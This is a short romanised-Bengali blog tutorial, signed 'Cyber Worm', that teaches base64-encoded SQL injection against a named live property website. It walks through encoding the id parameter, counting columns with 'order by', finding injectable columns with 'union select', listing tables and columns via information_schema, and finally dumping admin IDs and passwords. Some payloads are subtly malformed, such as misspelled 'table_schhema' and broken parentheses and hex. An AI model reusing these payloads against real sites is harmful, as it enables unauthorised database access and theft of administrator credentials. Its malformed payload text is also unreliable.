Base64 Based SQL INJECTION Tutorial

0
415
  -=- Author: Cyber Worm -=-

 
*First Hackbar Download kore nin

*Jodi Download Thake Tahole On Kore Nin..

Ami Ei Site Ta Use Korbo Tutorial Er Jonne :)

http://vizagpropertyhub.com/developers/index.php?id=MTU=

ekhon amader id= er por je value gulu ache she gula decode korte hobe
karon segula base54 format a ache…

Erpor id= er je value ta ache seta select kore Nin
Ebong Hackbar  er ENCODING OPTION A JAAN…
Ebong Lekha Ti Select Kore Decode A Click kOrun.,.
http://postimg.org/image/j5iueucoj/
Ekhob Decode Por Dekhte Pelam Je ,…

http://vizagpropertyhub.com/developers/index.php?id=15
ekhon amra etar sesh string ‘ add kore abar 15’ ke encode korbo base64..
Decode Korar Por Url Ta hobe..
http://vizagpropertyhub.com/developers/index.php?id=MTUn
..ekhon amra error dekhte pabo,, (Datamissing)
http://postimg.org/image/ipn4hu9c3/

so ekhon amra koita column ache seta ber korbo… :)

ekhon amora abar lekhatike base64 theke decode kore normal text a anbo …
then url ta hobe

http://vizagpropertyhub.com/developers/index.php?id=15
ekhon amra normal sql injection er moto kore column ber korar try korbo..!
order by command use kore,,,

http://vizagpropertyhub.com/developers/index.php?id=15 order by 10– –

ebong id soman value er por baki lekha gulu ke base64 a encode korbo..

erokom dekhabe…
http://postimg.org/image/xw3iitm8x/

kono Error dekhacche nah …
ekhon amra abar base64 theke normal text a decode kore …
order by er value bariye dekhbo ..!

order by 17– – diye try kore dekhi
http://vizagpropertyhub.com/developers/index.php?id=15 order by 17– –
ebong seta abar base64 a encode korbo ,… Error !
Abar Lekha Ti Ke Encode Kore order by 16– – diye abar encode korbo
http://vizagpropertyhub.com/developers/index.php?id=15 order by 16– –
Etake Base64 Encode Korbo :)

Page Load Hocche Thik Motoi :)
Tar Mane Column Er Sonkha :16
Ei tutorial a amra arekti jinish shikbo seta hocche kivabe and false ei command ti use kore…
vulnerable column Ber Korbo…

SO Ekhon Vulnerable Column ber Korar Jonne COmmand Ti Hobe …

http://vizagpropertyhub.com/developers/index.php?id=15 and false union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 — –

ekhon amora id= er por baki lekha gulu ke base64 e encode korbo :)
Ekhon Amra Vulnerable Columnn Pelam 4,5

ekhon amra Tables Name Ber kOrbo … Jar jOnee Ami USe kOrbo 5 No Column Ti :)

http://vizagpropertyhub.com/developers/index.php?id=15 and false union select 1,2,3,4,(select group_concat(table_name) from information_schema.tables where table_schhema=database()6,7,8,9,10,11,12,13,14,15,16 — –
ekhon abar amra id= value er por lekha gulu ke base64 a encode korbo :)
tarpor amra tables name dekhte pabo !

ekhon Kaj Hobe admin table niye ei table theke amra column ber korbo…
ekhon amra table er jaigai column ebong tables er jaigai columns lekhbo..!
table_schema er jaigai table_name dibo
ebong database() er jaigai admin ei lekhatar tar hex dibo…
http://vizagpropertyhub.com/developers/index.php?id=15 and false union select 1,2,3,4,(select group_concat(column_name) from information_schema.columns where table_name=0x,61646d596e6),7,8,9,10,11,12,13,14,15,16 — –
ebong etake base64 a enocde korbo :)
tarpor amra columns dekhte pabo :)
ekhon amra column dekhte pabo :)

amra column name theke admin id ebong password ber korbo …

jar jonne amader kaj hobe
admin_id
password ei duiti column name niye
..

ekhon amra
column er name jaigai ei command ti lekhbo admin_id,0x203a3a20,password ebong from er pore dibo admin
baki command gulu muche dibo,,, tobe column no gula thakbe ,.,. nicher link ta dekhun
http://vizagpropertyhub.com/developers/index.php?id=15 and false union select 1,2,3,4,(select group_concat(admin_id,0x203a3a20,password) from admin,7,8,9,10,11,12,13,14,15,16 — –

ekhon amra admin id and password dekhte pabo ;)

i am on facebook : http://fb.me/zayyan.ahmed.71
~END~
~Cyber Worm~

একটি উত্তর ত্যাগ